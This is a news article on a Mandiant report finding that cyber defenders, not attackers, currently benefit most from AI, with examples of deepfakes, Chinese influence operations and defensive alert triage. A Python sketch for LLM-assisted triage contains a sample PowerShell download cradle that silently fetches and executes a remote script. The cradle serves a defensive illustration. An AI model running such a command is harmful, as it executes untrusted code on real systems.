Cyber Defenders Lead the AI Arms Race for Now

Cyber defenders are, so far, winning the AI arms race: attackers have yet to meaningfully integrate AI tools into their intrusions, while defenders are already using them to real effect.

In a new report on the state of AI in cybersecurity, Mandiant said that while AI has the potential to pose a major threat in the future, it isn't one yet.

“Attackers are experimenting, and trying to create services around it. But as of right now, we haven’t responded to a single security incident where AI has played even a minor role, as far as we know,” says Sandra Joyce, vice president of Mandiant Intelligence with Google Cloud.

Meanwhile, “we’re actually doing quite a bit to leverage AI tools for defenders. I think we’re at a moment here where this is really an advantage,” she says.

Attackers Use AI for Social Engineering

In just two days at Black Hat 2023, 17 presentations covered AI or AI-related issues in cyberspace, including the event's opening keynote. Yet most were theoretical, concerning research that anticipates, rather than reacts to, real-life developments.

“Ever since 2019, we’ve seen threat actors in multiple countries leveraging GAN [generative adversarial network] images and fake profiles,” Joyce says. Beyond that, AI-generated video has begun to emerge in recent years. A Belarusian APT experimented with AI-assisted video in June 2021, and after the Russian invasion of Ukraine, miscreants used deepfake software to create a video purporting to show the surrender of President Volodymyr Zelenskyy.

However, the only threat actor consistently wielding AI today is DRAGONBRIDGE, which runs vast social media operations to spread messaging aligned with the political interests of the People’s Republic of China. This past March, the group used AI-generated imagery to negatively portray US political leaders. In May, it spread fake video news segments featuring an AI-generated presenter.

“AI tools are primarily being used in these information operations, for social engineering,” Joyce points out. Even the AI malware tools in the wild today are primarily geared towards that end — for example, WormGPT, designed to help malicious actors write more convincing phishing emails.

But even applications as obvious as that haven’t had much real-world impact, Joyce says. None of DRAGONBRIDGE’s campaigns, for example, has been of much consequence.

How Defenders Are Winning the AI Battle

While hackers take their time warming up to AI tools, cyber defenders have wasted no time at all.

“We’re using it for things like analyzing an alert for a PowerShell script, or writing YARA rules. We’re using it to analyze adversaries, smart contracts — so many applications are making it incredibly useful for defenders right now,” Joyce says.
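As a rough illustration of the kind of alert-triage workflow Joyce describes, the Python sketch below wraps a suspicious PowerShell command in a prompt a SOC analyst could hand to a language model. The send_to_llm() function is a hypothetical placeholder for whatever model endpoint a team has actually approved; none of this is Mandiant's or Google Cloud's tooling.

```python
# A minimal sketch of LLM-assisted alert triage, assuming the SOC already has
# access to some chat-style model endpoint. send_to_llm() is a hypothetical
# placeholder, not a real Mandiant or Google Cloud API.

def build_triage_prompt(script: str) -> str:
    """Wrap a suspicious PowerShell command in a triage prompt for an LLM."""
    return (
        "You are assisting a SOC analyst. Explain what the following "
        "PowerShell command does, flag indicators of malicious behavior "
        "(obfuscation, download cradles, persistence), and rate the "
        "severity as low, medium, or high.\n\n"
        f"{script}\n"
    )


def send_to_llm(prompt: str) -> str:
    """Placeholder: route the prompt to whichever model your team has approved."""
    raise NotImplementedError("Wire this to your organization's LLM endpoint.")


if __name__ == "__main__":
    # Classic download-cradle pattern, pointed at a harmless example domain.
    alert_script = (
        "powershell -nop -w hidden -c "
        "\"IEX (New-Object Net.WebClient)"
        ".DownloadString('https://example.com/update.ps1')\""
    )
    print(build_triage_prompt(alert_script))
```

In practice, the model's answer would be one input to a human analyst's decision, not a verdict on its own, and the prompt would be tuned to the team's own alert formats.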

The challenge for the good guys will be to fully capitalize on their advantage, before the attackers start to catch up.

For example, Joyce says, “people talk about the 750,000 person cyber workforce shortage. And a lot of the time, we’re talking about that from a supply perspective — of how many workers can we train and get out there? But what if we could [create] 10x each worker through AI?”

“How can we better monitor adversary infrastructure? How can we create content faster? How can we look for bad guys and find them sooner? Those are the things that we’re doing on a daily basis. So we’re thrilled to see how AI can help us do that,” she says.
